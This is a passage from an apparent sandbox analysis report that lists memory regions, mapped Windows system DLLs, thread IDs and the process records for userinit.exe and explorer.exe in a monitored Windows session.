pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 38479 start_va = 0x760d0000 
end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38480 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 38481 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 38482 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 38483 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 38484 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 38485 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 38486 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 38487 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38488 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 38489 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename 
= "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38490 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 38491 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38492 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38493 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38494 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38495 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38496 start_va = 0x630000 end_va = 0x8fefff entry_point = 0x630000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 38497 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 38498 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" 
Region: id = 38499 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 38500 start_va = 0xae0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 38501 start_va = 0xb70000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 38502 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38503 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 38504 start_va = 0x74be0000 end_va = 0x74bfdfff entry_point = 0x74be0000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 38505 start_va = 0x72ab0000 end_va = 0x72b33fff entry_point = 0x72ab0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 38506 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 38507 start_va = 0x771b0000 end_va = 0x77206fff entry_point = 0x771b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 38508 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") 
Region: id = 38509 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 38512 start_va = 0x74bc0000 end_va = 0x74bd1fff entry_point = 0x74bc0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 38513 start_va = 0x764a0000 end_va = 0x770e9fff entry_point = 0x764a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 38514 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 38515 start_va = 0x75060000 end_va = 0x75080fff entry_point = 0x75060000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 38516 start_va = 0x77730000 end_va = 0x77774fff entry_point = 0x77730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 38517 start_va = 0x72aa0000 end_va = 0x72aadfff entry_point = 0x72aa0000 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Thread: id = 1205 os_tid = 0x444 Thread: id = 1206 os_tid = 0x448 Thread: id = 1207 os_tid = 0x44c Thread: id = 1208 os_tid = 0x450 Thread: id = 1209 os_tid = 0x454 Thread: id = 1210 os_tid = 0x458 Thread: id = 1211 os_tid = 0x45c Process: id = "679" image_name = "userinit.exe" filename = "c:\\windows\\system32\\userinit.exe" page_root = "0x7f1d1240" os_pid = "0x468" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" 
parent_id = "666" os_parent_pid = "0x184" cmd_line = "C:\\Windows\\system32\\userinit.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000d91c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 38567 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 38568 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 38569 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 38570 start_va = 0x5d0000 end_va = 0x5d8fff entry_point = 0x5d0000 region_type = mapped_file name = "userinit.exe" filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe") Region: id = 38571 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 38572 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 38573 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 38574 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" 
Region: id = 38575 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 38577 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 38578 start_va = 0x1d0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 38579 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 38580 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 38581 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 38582 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 38583 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 38584 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 38585 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 38586 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 
region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 38587 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 38588 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 38589 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 38590 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 38591 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 38592 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 38593 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 38594 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 38595 start_va = 0x1d0000 end_va = 0x1ecfff entry_point = 0x1d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38596 start_va = 0x2c0000 end_va = 0x2cffff 
entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 38597 start_va = 0x1d0000 end_va = 0x1ecfff entry_point = 0x1d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38598 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38599 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 38600 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 38601 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 38602 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 38603 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 38604 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 38605 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 38606 start_va = 0x11e0000 end_va = 0x15d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 38607 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = 
"\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 38608 start_va = 0x200000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 38613 start_va = 0x15e0000 end_va = 0x16befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015e0000" filename = "" Region: id = 38614 start_va = 0x74750000 end_va = 0x74762fff entry_point = 0x74750000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 38615 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 38616 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38617 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Thread: id = 1214 os_tid = 0x46c Process: id = "680" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7f1d1260" os_pid = "0x470" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "679" os_parent_pid = "0x468" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000d91c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 38618 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id 
= 38619 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 38620 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 38621 start_va = 0xcb0000 end_va = 0xf30fff entry_point = 0xcb0000 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 38622 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 38623 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 38624 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 38625 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 38626 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 38629 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 38630 start_va = 0x1d0000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 38631 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 38632 start_va = 
0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 38633 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 38634 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 38635 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 38636 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 38637 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 38638 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 38639 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 38640 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 38641 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name 
= "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 38642 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 38643 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 38644 start_va = 0x771b0000 end_va = 0x77206fff entry_point = 0x771b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 38645 start_va = 0x764a0000 end_va = 0x770e9fff entry_point = 0x764a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 38646 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38647 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 38648 start_va = 0x72910000 end_va = 0x72a7efff entry_point = 0x72910000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 38649 start_va = 0x74800000 end_va = 0x7482efff entry_point = 0x74800000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 38650 start_va = 0x74830000 end_va = 
0x748e1fff entry_point = 0x74830000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 38651 start_va = 0x20000 end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 38652 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38653 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 38654 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 38655 start_va = 0x74220000 end_va = 0x74244fff entry_point = 0x74220000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 38656 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 38657 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 38658 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 38659 start_va = 0x74750000 end_va = 0x74762fff 
entry_point = 0x74750000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 38660 start_va = 0x73f40000 end_va = 0x73f49fff entry_point = 0x73f40000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 38661 start_va = 0x748f0000 end_va = 0x74a7ffff entry_point = 0x748f0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 38662 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 38663 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 38664 start_va = 0x74ac0000 end_va = 0x74bb4fff entry_point = 0x74ac0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 38665 start_va = 0x370000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 38666 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 38667 start_va = 0x1d0000 end_va = 0x1d6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 38668 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 38669 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 38670 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 38671 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 38672 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 38673 start_va = 0x570000 end_va = 0x962fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 38674 start_va = 0xf40000 end_va = 0x1b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 38675 start_va = 0x210000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 38676 start_va = 0x370000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 38677 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 38678 start_va = 0x970000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 38679 start_va = 0xb40000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 38680 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 38681 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = 
